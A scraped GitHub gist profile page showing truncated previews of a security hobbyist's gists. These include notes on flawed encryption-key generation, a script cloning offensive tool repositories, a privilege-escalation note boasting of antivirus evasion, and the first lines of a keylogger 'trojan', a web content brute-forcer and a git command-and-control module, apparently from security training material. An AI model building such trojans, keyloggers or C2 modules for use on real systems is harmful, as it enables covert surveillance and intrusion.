Skip to content

Instantly share code, notes, and snippets.

View sh1nu11bi's full-sized avatar

sh1nu11bi

View GitHub Profile
@sh1nu11bi
sh1nu11bi / byte-sizetuts.md
Created June 25, 2016 08:45 — forked from honkskillet/byte-sizetuts.md
A series of golang tutorials with youtube videos.
@sh1nu11bi
sh1nu11bi / MAIN_Instructions
Created June 10, 2016 23:09
This will contained both text documents and code snippets that will be reference in the text documents. The objective is to find an alternative method for inherent flaws in this code
Seed of Random Algorithm
The most important security flaw is in creating random encryption key process. I used .Net’s Random Class to generate random strings. Random Class uses Environment.TickCount (gets the number of milliseconds elapsed since the system started) as seed. Which is reduces the surface of brute forcing and beyond that it’s easy to predict.
<snippet1>
Reuse of the IV
Algorithm uses the same IV for every file in encryption process.
#!/usr/bin/bash
a=`cat <<-EOF
https://github.com/averagesecurityguy/scripts.git
https://github.com/zackiles/Rspoof.git
https://github.com/sh1nu11bi/sshuttle.git
https://github.com/sh1nu11bi/evercookie.git
https://github.com/sh1nu11bi/cortana-scripts.git
https://github.com/sh1nu11bi/Generate-Macro.git
https://github.com/googleinurl/SCANNER-INURLBR.git
https://github.com/1N3/BruteX.git

Keybase proof

I hereby claim:

  • I am sh1nu11bi on github.
  • I am sh1nu11bi (https://keybase.io/sh1nu11bi) on keybase.
  • I have a public key whose fingerprint is 3BA5 FB9B C6C3 4812 15D8 04CB 0FBA 146F E8FD 3B2B

To claim this, I am signing this object:

@sh1nu11bi
sh1nu11bi / info_sec python modules
Created February 19, 2015 15:31
This a collection of Python modules commonly associated with InfoSec.
Scapy: send, sniff and dissect and forge network packets. Usable interactively or as a library
pypcap, Pcapy and pylibpcap: several different Python bindings for libpcap
libdnet: low-level networking routines, including interface lookup and Ethernet frame transmission
dpkt: fast, simple packet creation/parsing, with definitions for the basic TCP/IP protocols
Impacket: craft and decode network packets. Includes support for higher-level protocols such as NMB and SMB
pynids: libnids wrapper offering sniffing, IP defragmentation, TCP stream reassembly and port scan detection
Dirtbags py-pcap: read pcap files without libpcap
flowgrep: grep through packet payloads using regular expressions
Knock Subdomain Scan, enumerate subdomains on a target domain through a wordlist
Mallory, extensible TCP/UDP man-in-the-middle proxy, supports modifying non-standard protocols on the fly
@sh1nu11bi
sh1nu11bi / Sublime setup
Created February 19, 2015 03:51
Sublime Text Set-up
1.Download Version/acrh for sublime text2
http://www.sublimetext.com/2
Packages download
I used to use Sublime Text 2 with
@sh1nu11bi
sh1nu11bi / PrivEsc.txt
Created February 18, 2015 17:54
BH_Python_Windows Privelage Escalation
This process does not involve any API hooking, so we can fly under most anti-virus software's radar.
localhost$ easy_install pywin32 wmi
http://sourceforge.net/projects/pywin32
@sh1nu11bi
sh1nu11bi / keylogger.py
Created February 18, 2015 17:52
Windows Trojan-BH_Python
from ctypes import *
import pythoncom
import pyHook
import win32clipboard
user32 = windll.user32
kernel32 = windll.kernel32
psapi = windll.psapi
current_window = None
@sh1nu11bi
sh1nu11bi / content_bruter.py
Created February 18, 2015 17:51
WebApplicationScanning
import urllib2
import urllib
import threading
import Queue
threads = 5
target_url = "http://testphp.vulnweb.com"
wordlist_file = "/tmp/all.txt" # from SVNDigger
resume = None
user_agent = "Mozilla/5.0 (X11; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0"
@sh1nu11bi
sh1nu11bi / dirlister.py
Created February 18, 2015 17:49
Git_Command and Control_BH Python
# dirlister.py
__version__ = "0.1"
import os
def run(**args):
print "[*] Dirlister module."
files = os.listdir(".")
return str(files)